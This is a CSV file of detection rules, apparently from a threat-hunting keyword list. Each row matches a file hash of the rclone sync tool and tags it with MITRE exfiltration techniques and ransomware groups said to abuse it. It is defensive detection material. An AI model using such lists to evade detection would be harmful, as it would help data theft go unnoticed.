"*9d7c62cfabf136368543cab714f0ba1ba1165a8d4fd5e535736976ebb95303c5*",".{0,1000}9d7c62cfabf136368543cab714f0ba1ba1165a8d4fd5e535736976ebb95303c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9dfed608d8c377ee0d9fc5aefcfb535155fd0693b9bc804c1f8311b2ac1dcad1*",".{0,1000}9dfed608d8c377ee0d9fc5aefcfb535155fd0693b9bc804c1f8311b2ac1dcad1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9e54ead1385e23d4b5c663545001d13db7c653225fe997fcf7d6092ccd2a221a*",".{0,1000}9e54ead1385e23d4b5c663545001d13db7c653225fe997fcf7d6092ccd2a221a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9e71f08fe3818175111038f681747563b50d4673ec9b4404446bd2a7bb7d5063*",".{0,1000}9e71f08fe3818175111038f681747563b50d4673ec9b4404446bd2a7bb7d5063.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9e7b19f19410ca164f057020918c128e8b6cf603c24386f80ddd7ef3cd9ae5bc*",".{0,1000}9e7b19f19410ca164f057020918c128e8b6cf603c24386f80ddd7ef3cd9ae5bc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9e900a0da021bf0cc58e16ccaea35d8ffc115aed8fb99d0deed5b3c01e822ad0*",".{0,1000}9e900a0da021bf0cc58e16ccaea35d8ffc115aed8fb99d0deed5b3c01e822ad0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9ed99f3c7be08a47125d73169959a738b152b8c2dcfac42fca34e5edb0448a88*",".{0,1000}9ed99f3c7be08a47125d73169959a738b152b8c2dcfac42fca34e5edb0448a88.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9ef83833296876f3182b87030b4f2e851b56621bad4ca4d7a14753553bb8b640*",".{0,1000}9ef83833296876f3182b87030b4f2e851b56621bad4ca4d7a14753553bb8b640.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9efbe8b459a63d573e27712d030b3c36e7cdc92c1f33461c401ca81cdb0e8e71*",".{0,1000}9efbe8b459a63d573e27712d030b3c36e7cdc92c1f33461c401ca81cdb0e8e71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9f2bbb3d0ecd30411181adfe61a09f64e7d3003e55703d5ab5433cb68b905038*",".{0,1000}9f2bbb3d0ecd30411181adfe61a09f64e7d3003e55703d5ab5433cb68b905038.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9f7050d57a380a76aab9f89fa7d44884db808b526261fad94a62797c831e1cbf*",".{0,1000}9f7050d57a380a76aab9f89fa7d44884db808b526261fad94a62797c831e1cbf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9fa3d83395b5d3ed3b9ab096aababbbddd71ebf90ae37ddfd24f168d9f909bad*",".{0,1000}9fa3d83395b5d3ed3b9ab096aababbbddd71ebf90ae37ddfd24f168d9f909bad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9fc2a410869d7c8ec6e01cccc1b5013b512a22982bc9675ff2f6443976f1b59b*",".{0,1000}9fc2a410869d7c8ec6e01cccc1b5013b512a22982bc9675ff2f6443976f1b59b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9fefe059c5e2a23b4f92bc8b292f5942543a28e265bf06f123686483a8241b4a*",".{0,1000}9fefe059c5e2a23b4f92bc8b292f5942543a28e265bf06f123686483a8241b4a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a0d678feb4b1d5460a2b6dc94cbf1168db92da55a52064d452f6046f6fb8b3ab*",".{0,1000}a0d678feb4b1d5460a2b6dc94cbf1168db92da55a52064d452f6046f6fb8b3ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a111d393d4f49bc4f3969a399962a576f142f58ea165f84186970e24e5c9eeba*",".{0,1000}a111d393d4f49bc4f3969a399962a576f142f58ea165f84186970e24e5c9eeba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a12da8d4bdf8a29cdb41d332b700ac882f5d9c2352cb7696636e56ecbae3a883*",".{0,1000}a12da8d4bdf8a29cdb41d332b700ac882f5d9c2352cb7696636e56ecbae3a883.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a17504a9ca029f89214959636206e22292ed49c26a28dd530a883c12d9ac1977*",".{0,1000}a17504a9ca029f89214959636206e22292ed49c26a28dd530a883c12d9ac1977.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a1a3bb9524011ce83b48f12ef28ad35dbf7f6022a8875a040d4c5d0dc982458a*",".{0,1000}a1a3bb9524011ce83b48f12ef28ad35dbf7f6022a8875a040d4c5d0dc982458a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a1fb68b35a61692176728a943a95433fb26263a3a6439239a122eb6e6918d2cd*",".{0,1000}a1fb68b35a61692176728a943a95433fb26263a3a6439239a122eb6e6918d2cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a21da11f4b13fe90291c32e009c9aa97784650634b8be5db08d075a43453b72d*",".{0,1000}a21da11f4b13fe90291c32e009c9aa97784650634b8be5db08d075a43453b72d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a226d27b749d8376ceb696401bd3186e9942d5ed055aba2a37cff5d835aa510a*",".{0,1000}a226d27b749d8376ceb696401bd3186e9942d5ed055aba2a37cff5d835aa510a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a2325e3fae41452930747860e4bcc8e6767b55d041788a4e1d583ec1c63ed648*",".{0,1000}a2325e3fae41452930747860e4bcc8e6767b55d041788a4e1d583ec1c63ed648.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a237c330ee6a0a63a4604457b51440f9b34b8782a044ee247d8eba0bb4353dda*",".{0,1000}a237c330ee6a0a63a4604457b51440f9b34b8782a044ee247d8eba0bb4353dda.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a26d3db2560ca9d7c85ba716c7df74d53a6a10166ab88f338a73a19bf4ea04d8*",".{0,1000}a26d3db2560ca9d7c85ba716c7df74d53a6a10166ab88f338a73a19bf4ea04d8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a2832e8890afc52378378b32a90719a1183d1323c957a87c54fcd9329e702033*",".{0,1000}a2832e8890afc52378378b32a90719a1183d1323c957a87c54fcd9329e702033.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a2ca44232694b093a519194ef60da00ba8a0ab33de579105c1945b9dc00097cc*",".{0,1000}a2ca44232694b093a519194ef60da00ba8a0ab33de579105c1945b9dc00097cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a34e20b1abe27f830bdc259a6d9813a521bab31004cc9de8924fbc9833d9f3f5*",".{0,1000}a34e20b1abe27f830bdc259a6d9813a521bab31004cc9de8924fbc9833d9f3f5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a3f300ec99b3dc8666396091067c8a7ccc224d05d1ce67f66b67f88cd0d3b279*",".{0,1000}a3f300ec99b3dc8666396091067c8a7ccc224d05d1ce67f66b67f88cd0d3b279.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a40a7980c5fbe507c565bfd7dc5ce979b287ace92ffacb4e5209deef2d2bf5fa*",".{0,1000}a40a7980c5fbe507c565bfd7dc5ce979b287ace92ffacb4e5209deef2d2bf5fa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a460000e3b3b1aa7da1909db5743f6b90b4df8ca8ead740e47136d3abeffbaec*",".{0,1000}a460000e3b3b1aa7da1909db5743f6b90b4df8ca8ead740e47136d3abeffbaec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a4ea0ed17ef1028ac4a9f18bc7fc1aae6e3dd741cdaee8c073c66b8316ba2fc1*",".{0,1000}a4ea0ed17ef1028ac4a9f18bc7fc1aae6e3dd741cdaee8c073c66b8316ba2fc1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a55808e01d6b1dfb6776665e566a8e434b0ff2846451909fd8748a7ce0d4c031*",".{0,1000}a55808e01d6b1dfb6776665e566a8e434b0ff2846451909fd8748a7ce0d4c031.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a55f8d6661a379fe2992f0054da97667d021f6bcbc5a5aa6c5b91828e8112711*",".{0,1000}a55f8d6661a379fe2992f0054da97667d021f6bcbc5a5aa6c5b91828e8112711.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a56d026e58a0dd62c8104fc9deb5a60ab7a531ae657a950f5f4fa8bc9765931e*",".{0,1000}a56d026e58a0dd62c8104fc9deb5a60ab7a531ae657a950f5f4fa8bc9765931e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*a59970f075f30ba38301eb4eafd5eb0149f86c84649c99488394d4e01d08aa25*",".{0,1000}a59970f075f30ba38301eb4eafd5eb0149f86c84649c99488394d4e01d08aa25.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
